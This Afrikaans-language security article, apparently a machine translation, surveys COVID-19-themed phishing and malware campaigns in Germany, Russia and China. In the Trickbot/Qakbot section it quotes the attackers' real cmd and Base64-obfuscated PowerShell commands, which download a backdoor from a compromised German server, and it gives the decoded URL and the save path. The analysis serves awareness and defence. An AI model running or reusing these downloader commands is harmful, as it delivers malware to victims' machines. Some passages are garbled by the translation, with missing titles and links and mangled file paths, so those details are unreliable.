Aanvallers gaan voort om die COVID-19-onderwerp uit te buit, wat meer en meer bedreigings skep vir gebruikers wat baie belangstel in alles wat met die epidemie verband hou. IN Ons het reeds gepraat oor watter soorte wanware verskyn het in die nasleep van die koronavirus, en vandag sal ons praat oor sosiale ingenieurstegnieke wat gebruikers in verskillende lande, insluitend Rusland, reeds teëgekom het. Algemene neigings en voorbeelde is onder die knie.
Onthou in Ons het gepraat oor die feit dat mense bereid is om nie net oor die koronavirus en die verloop van die epidemie te lees nie, maar ook oor finansiële ondersteuningsmaatreëls? Hier is 'n goeie voorbeeld. ’n Interessante uitvissing-aanval is in die Duitse deelstaat Noordryn-Wesfale of NRW ontdek. Die aanvallers het kopieë van die Ministerie van Ekonomie-webwerf geskep (), waar enigiemand om finansiële bystand kan aansoek doen. So 'n program bestaan eintlik, en dit blyk voordelig te wees vir swendelaars. Nadat hulle die persoonlike data van hul slagoffers ontvang het, het hulle 'n aansoek op die regte ministerie se webwerf gedoen, maar ander bankbesonderhede aangedui. Volgens amptelike data is 4 duisend sulke vals versoeke gemaak totdat die skema ontdek is. Gevolglik het $109 miljoen wat vir geaffekteerde burgers bedoel was, in die hande van bedrieërs geval.
Wil jy 'n gratis toets vir COVID-19 hê?
Nog 'n belangrike voorbeeld van uitvissing met 'n koronavirus-tema was in e-posse. Die boodskappe het die aandag van gebruikers getrek met 'n aanbod om gratis toetse vir koronavirusinfeksie te ondergaan. In die aanhangsel van hierdie daar was gevalle van Trickbot/Qakbot/Qbot. En toe diegene wat hul gesondheid wil nagaan, begin om "die aangehegte vorm in te vul", is 'n kwaadwillige skrif na die rekenaar afgelaai. En om sandbox-toetsing te vermy, het die skrif eers na 'n rukkie begin om die hoofvirus af te laai, toe die beskermingstelsels oortuig was dat geen kwaadwillige aktiwiteit sou plaasvind nie.
Dit was ook maklik om die meeste gebruikers te oortuig om makro's te aktiveer. Om dit te doen, is 'n standaard truuk gebruik: om die vraelys in te vul, moet jy eers makro's aktiveer, wat beteken dat jy 'n VBA-skrip moet laat loop.
Soos u kan sien, is die VBA-skrip spesiaal gemasker van antivirusse.
Windows het 'n wagfunksie waar die toepassing /T <sekondes> wag voordat die verstek "Ja"-antwoord aanvaar word. In ons geval het die skrip 65 sekondes gewag voordat tydelike lêers uitgevee is:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
En terwyl daar gewag word, is wanware afgelaai. 'n Spesiale PowerShell-skrip is hiervoor bekendgestel:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Nadat die Base64-waarde gedekodeer is, laai die PowerShell-skrip die agterdeur af wat op die voorheen gehackte webbediener van Duitsland geleë is:
http://automatischer-staubsauger.com/feature/777777.pngen stoor dit onder die naam:
C:UsersPublictmpdirfile1.exe
Map ‘C:UsersPublictmpdir’ word uitgevee wanneer die 'tmps1.bat'-lêer uitgevoer word wat die opdrag bevat cmd /c mkdir ""C:UsersPublictmpdir"".
Doelgerigte aanval op regeringsinstansies
Boonop het FireEye-ontleders onlangs 'n geteikende APT32-aanval gerapporteer wat gemik is op regeringstrukture in Wuhan, sowel as die Chinese Ministerie van Noodbestuur. Een van die verspreide RTF's bevat 'n skakel na 'n New York Times-artikel getiteld . Met die lees daarvan is wanware egter afgelaai (FireEye-ontleders het die geval as METALJACK geïdentifiseer).
Interessant genoeg, ten tyde van opsporing, het geen van die antivirusse hierdie geval opgespoor nie, volgens Virustotal.
Wanneer amptelike webwerwe af is
Die treffendste voorbeeld van 'n uitvissing-aanval het net nou die dag in Rusland plaasgevind. Die rede hiervoor was die aanstelling van 'n langverwagte voordeel vir kinders van 3 tot 16 jaar. Toe die begin van die aanvaarding van aansoeke op 12 Mei 2020 aangekondig is, het miljoene hulle na die Staatsdienste-webwerf gehaas vir die langverwagte hulp en die portaal nie erger as 'n professionele DDoS-aanval afgebring nie. Toe die president gesê het dat "Staatsdienste nie die vloei van aansoeke kon hanteer nie," het mense aanlyn begin praat oor die bekendstelling van 'n alternatiewe webwerf om aansoeke te aanvaar.
Die probleem is dat verskeie werwe tegelyk begin werk het, en terwyl een, die regte een by posobie16.gosuslugi.ru, eintlik aansoeke aanvaar, meer .
Kollegas van SearchInform het ongeveer 30 nuwe bedrieglike domeine in die .ru-sone gevind. Infosecurity en Softline Company het sedert die begin van April meer as 70 soortgelyke vals staatsdienswebwerwe opgespoor. Hulle skeppers manipuleer bekende simbole en gebruik ook kombinasies van die woorde gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, ensovoorts.
Hype en sosiale ingenieurswese
Al hierdie voorbeelde bevestig net dat aanvallers die onderwerp van koronavirus suksesvol monetiseer. En hoe hoër die sosiale spanning en hoe meer onduidelike kwessies, hoe meer kanse het swendelaars om belangrike data te steel, mense te dwing om hul geld op hul eie prys te gee, of bloot meer rekenaars te hack.
En aangesien die pandemie potensieel onvoorbereide mense gedwing het om massaal tuis te werk, is nie net persoonlike nie, maar ook korporatiewe data in gevaar. Byvoorbeeld, onlangs is Microsoft 365 (voorheen Office 365)-gebruikers ook aan 'n uitvissing-aanval onderwerp. Mense het massiewe "gemis" stemboodskappe as aanhangsels by briewe ontvang. Die lêers was egter eintlik 'n HTML-bladsy waarna die slagoffers van die aanval gestuur is . As gevolg hiervan, verlies van toegang en kompromie van alle data van die rekening.
Bron: will.com